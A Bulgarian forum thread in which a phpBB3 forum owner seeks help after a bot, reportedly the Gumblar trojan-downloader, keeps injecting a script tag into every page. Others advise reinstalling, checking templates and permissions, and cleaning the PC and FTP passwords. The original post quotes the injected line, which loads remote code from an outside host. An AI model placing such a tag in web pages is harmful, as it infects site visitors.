Вирус бот хаква форума ми през 12 часа. Как да го премахна?

Статус
Not open for further replies.
W

WildBeast

Registered
Добър вечер. От няколко дена някакъв вирус хаква форума ми и поставя следното във всяка една страница:

Код: 
<script src=http://incabrasil.org.br/admin/upload_imagens/adminsupernews.php ></script>

След като този бот постави кода, на всяка една страница има само и единствено един бял екран и нищо друго. Някой хора ми казаха, че им го засича като Trojan-Downloader.JS.Gumblar.xURL. Хоста, на който е качен форума ми е cbox.biz. Някой може ли да ми помогне :(. Много е нахален този бот, всеки ден хаква форума.
 
И какъв ти е форума?
phpBB 2? 3? Ako e 2 то коя версия е?
Не може ли да го преинсталираш отново. да изтриеш всички файлове и да
инсталираш нов форум .
След това само го връзваш със старата база данни и така поне ще си сигурен, че ако е имало зловреден код той е изтрит.
 
admin каза:
И какъв ти е форума?
phpBB 2? 3? Ako e 2 то коя версия е?
Не може ли да го преинсталираш отново. да изтриеш всички файлове и да
инсталираш нов форум .
След това само го връзваш със старата база данни и така поне ще си сигурен, че ако е имало зловреден код той е изтрит.
Увеличете...
Версия: 3
Преинсталирания: 2 пъти вече и все същата история..
 
WildBeast каза:
admin каза:
И какъв ти е форума?
phpBB 2? 3? Ako e 2 то коя версия е?
Не може ли да го преинсталираш отново. да изтриеш всички файлове и да
инсталираш нов форум .
След това само го връзваш със старата база данни и така поне ще си сигурен, че ако е имало зловреден код той е изтрит.
Увеличете...
Версия: 3
Преинсталирания: 2 пъти вече и все същата история..
Увеличете...
От къде взимаш файловете за преинстал?
От официалният сайт?
Искаш да кажеш, че слагаш чисто нови файлове от последната версия на
phpbb3 и след това някой те хаква?
Вътре във файла ти слага код или в мнение?
Къде точно го слага този код и ако знаеш коя версия точно използваш?
Потърси ли в нета дали няма някъде да се коментира, че има подобен хак.
Може да е описан.
 
Ако слагаш и някакви допълнителни модове тогава никой не може да ти помогне. В много модове има зловреден код.
Някой от темплейтите също може да се използва за хакване.
Ако ползваш готови модове или готови темплейти е възможно да те хакнат.
При преинстала ако ги инсталираш и тях отново (модовете и темплейтите ) няма как да се измъкнеш.
 
Версията е последната, файловете са чисто нови, кода го слага във всяка една страница (не като мнение), търсих на друго място, но не намерих решение и затова опитвам да намеря решение тук.
 
WildBeast каза:
Версията е последната, файловете са чисто нови, кода го слага във всяка една страница (не като мнение), търсих на друго място, но не намерих решение и затова опитвам да намеря решение тук.
Увеличете...

За да го сложи във всяка страница трябва да промени файл.
Най-лесно е дa погледнеш header и footer темплейтите.
Не мога да дам отговор без код а и не познавам phpbb3.
Най-добре би било да погледнеш този код къде излиза.
Ако е в футер-а трябва да почнеш от темплейт файла на футера и
от там да търсиш причина или проблем.
Не бих искал да си помислям, че някой ти е хакнал хоста или ти знае паролите за достъп.
Най вероятно е някакъв хак за тази версия на phpbb но как да съм сигурен.
 
провери на хоста си да нямаш ъплуд на файлове и някой да е качил файл с .php и да си цъка само и да става мазало ..

другия варянт е да си провериш CHMOD на файловете и както каза админ ако си слагал модове или някви измислени темплейти ги махни .
 
Здравей, и аз съм имал подобен проблем само, че при мен добавяше iframes. Докато си сърфирал из интернет си свалил някой вирус (като моя), който ти добавя този код всеки път когато редактираш файл с notepad или друга текстова програма. Свали си последната версия на аваст и сканирай компютъра си. Аз така се отървах. :)
 
webdeveloper каза:
Здравей, и аз съм имал подобен проблем само, че при мен добавяше iframes. Докато си сърфирал из интернет си свалил някой вирус (като моя), който ти добавя този код всеки път когато редактираш файл с notepad или друга текстова програма. Свали си последната версия на аваст и сканирай компютъра си. Аз така се отървах. :)
Увеличете...
Ползвам ESET NOD32 Antivirus 4.0.435.0. Според мен проблема не идва от моят компютър, тъй като аз го слагам на "Stand By" към 24 часа, а според тиксо брояча ~02:00 часа сайта е бил хакнат, така че проблема не е в мен, а най-вероятно проблема е в хоста.
 
human каза:
А случайно да сменяш паролата след като оправяш сайта?
Увеличете...
От къде е взел паролата? Ако я сменя, той пак ще я вземе и все същата история..
 
Вирусите взимат паролите от запомнените ти в FTP клиента (до колкото знам).

Изчисти си компютъра от вируси, смени паролите и качи на ново форума.

Ако и тогава го хакнат - пиши на съпорта на хостинга.
 
human каза:
Вирусите взимат паролите от запомнените ти в FTP клиента (до колкото знам).

Изчисти си компютъра от вируси, смени паролите и качи на ново форума.

Ако и тогава го хакнат - пиши на съпорта на хостинга.
Увеличете...
Така и ще направя. Може да заключвате вече.
 
Статус
Not open for further replies.

Back
Горе